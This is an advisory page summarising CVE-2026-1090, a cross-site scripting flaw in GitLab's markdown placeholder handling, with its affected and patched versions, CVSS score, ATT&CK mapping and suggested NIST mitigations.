CVE-2026-1090
Published: 11 March 2026
Summary
CVE-2026-1090 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Gitlab Gitlab. Its CVSS base score is 8.7 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique JavaScript (T1059.007); ranked at the 22.1th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
SI-15 requires filtering of information outputs during markdown processing to prevent JavaScript injection from unsanitized placeholder content.
SI-10 mandates validation of placeholder content inputs to ensure proper sanitization before markdown rendering, directly mitigating the XSS flaw.
SI-2 ensures timely patching of the sanitization vulnerability, as demonstrated by GitLab's fixes in versions 18.7.6, 18.8.6, and 18.9.2.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
XSS enables direct injection and execution of arbitrary JavaScript in the victim's browser context.
NVD Description
GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.6 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user, when the `markdown_placeholders` feature flag was enabled, to inject JavaScript in…
more
a browser due to improper sanitization of placeholder content in markdown processing.
Deeper analysisAI
CVE-2026-1090 is a cross-site scripting vulnerability (CWE-79) affecting GitLab Community Edition (CE) and Enterprise Edition (EE) in all versions from 10.6 prior to 18.7.6, 18.8 prior to 18.8.6, and 18.9 prior to 18.9.2. The flaw arises from improper sanitization of placeholder content during markdown processing when the `markdown_placeholders` feature flag is enabled, enabling JavaScript injection in a browser.
An authenticated user can exploit this vulnerability remotely with low attack complexity, though it requires user interaction. Exploitation allows the attacker to inject malicious JavaScript, resulting in high confidentiality and integrity impacts with a changed scope, as reflected in its CVSS 3.1 score of 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N).
GitLab remediated the issue with patches released in versions 18.7.6, 18.8.6, and 18.9.2, as documented in the patch release notes for 18.9.2. Additional details are provided in GitLab work item 586478 and the originating HackerOne report 3502450.
Details
- CWE(s)